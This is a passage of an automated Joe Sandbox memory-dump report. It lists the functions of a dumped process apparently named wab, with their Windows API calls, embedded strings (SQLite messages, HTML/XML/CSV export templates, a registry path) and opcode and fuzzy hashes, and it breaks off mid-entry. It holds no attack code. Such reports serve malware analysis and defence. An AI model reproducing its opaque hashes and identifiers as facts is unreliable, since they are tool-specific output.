                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageRectSend$Client
                                      • String ID:
                                      • API String ID: 2047574939-0
                                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                      • String ID:
                                      • API String ID: 4218492932-0
                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                      APIs
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                      • memcpy.MSVCRT ref: 0044A8BF
                                      • memcpy.MSVCRT ref: 0044A90C
                                      • memcpy.MSVCRT ref: 0044A988
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                      • memcpy.MSVCRT ref: 0044A9D8
                                      • memcpy.MSVCRT ref: 0044AA19
                                      • memcpy.MSVCRT ref: 0044AA4A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: gj
                                      • API String ID: 438689982-4203073231
                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                      • API String ID: 3510742995-2446657581
                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                      • memset.MSVCRT ref: 00405ABB
                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                      • SetFocus.USER32(?), ref: 00405B76
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$FocusItemmemset
                                      • String ID:
                                      • API String ID: 4281309102-0
                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscat
                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                      • API String ID: 384018552-4153097237
                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                      • String ID: 0$6
                                      • API String ID: 2029023288-3849865405
                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                      APIs
                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                      • memset.MSVCRT ref: 00405455
                                      • memset.MSVCRT ref: 0040546C
                                      • memset.MSVCRT ref: 00405483
                                      • memcpy.MSVCRT ref: 00405498
                                      • memcpy.MSVCRT ref: 004054AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$memcpy$ErrorLast
                                      • String ID: 6$\
                                      • API String ID: 404372293-1284684873
                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                      • wcscpy.MSVCRT ref: 0040A0D9
                                      • wcscat.MSVCRT ref: 0040A0E6
                                      • wcscat.MSVCRT ref: 0040A0F5
                                      • wcscpy.MSVCRT ref: 0040A107
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                      • String ID:
                                      • API String ID: 1331804452-0
                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                      APIs
                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: advapi32.dll
                                      • API String ID: 2012295524-4050573280
                                      • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                      • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                      APIs
                                      Strings
                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                      • <%s>, xrefs: 004100A6
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                      • API String ID: 3473751417-2880344631
                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscat$_snwprintfmemset
                                      • String ID: %2.2X
                                      • API String ID: 2521778956-791839006
                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintfwcscpy
                                      • String ID: dialog_%d$general$menu_%d$strings
                                      • API String ID: 999028693-502967061
                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memsetstrlen
                                      • String ID:
                                      • API String ID: 2350177629-0
                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                      • API String ID: 2221118986-1606337402
                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                      • String ID:
                                      • API String ID: 265355444-0
                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                      APIs
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                      • memset.MSVCRT ref: 0040C439
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                      • _wcsupr.MSVCRT ref: 0040C481
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      • memset.MSVCRT ref: 0040C4D0
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                      • String ID:
                                      • API String ID: 1973883786-0
                                      • Opcode ID: 1feb52858db15dd91b7da34a228e5fbc97f025fd2114143e227eed2c0e019c89
                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                      • Opcode Fuzzy Hash: 1feb52858db15dd91b7da34a228e5fbc97f025fd2114143e227eed2c0e019c89
                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                      APIs
                                      • memset.MSVCRT ref: 004116FF
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                      • API String ID: 2618321458-3614832568
                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                      APIs
                                      • memset.MSVCRT ref: 004185FC
                                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@AttributesFilememset
                                      • String ID:
                                      • API String ID: 776155459-0
                                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                      • malloc.MSVCRT ref: 00417524
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                      • String ID:
                                      • API String ID: 2308052813-0
                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                      APIs
                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PathTemp$??3@
                                      • String ID: %s\etilqs_$etilqs_
                                      • API String ID: 1589464350-1420421710
                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                      APIs
                                      • memset.MSVCRT ref: 0040FDD5
                                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                      • String ID: <%s>%s</%s>$</item>$<item>
                                      • API String ID: 1775345501-2769808009
                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                      APIs
                                      • wcscpy.MSVCRT ref: 0041477F
                                      • wcscpy.MSVCRT ref: 0041479A
                                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscpy$CloseCreateFileHandle
                                      • String ID: General
                                      • API String ID: 999786162-26480598
                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ErrorLastMessage_snwprintf
                                      • String ID: Error$Error %d: %s
                                      • API String ID: 313946961-1552265934
                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: foreign key constraint failed$new$oid$old
                                      • API String ID: 0-1953309616
                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                      APIs
                                      Strings
                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
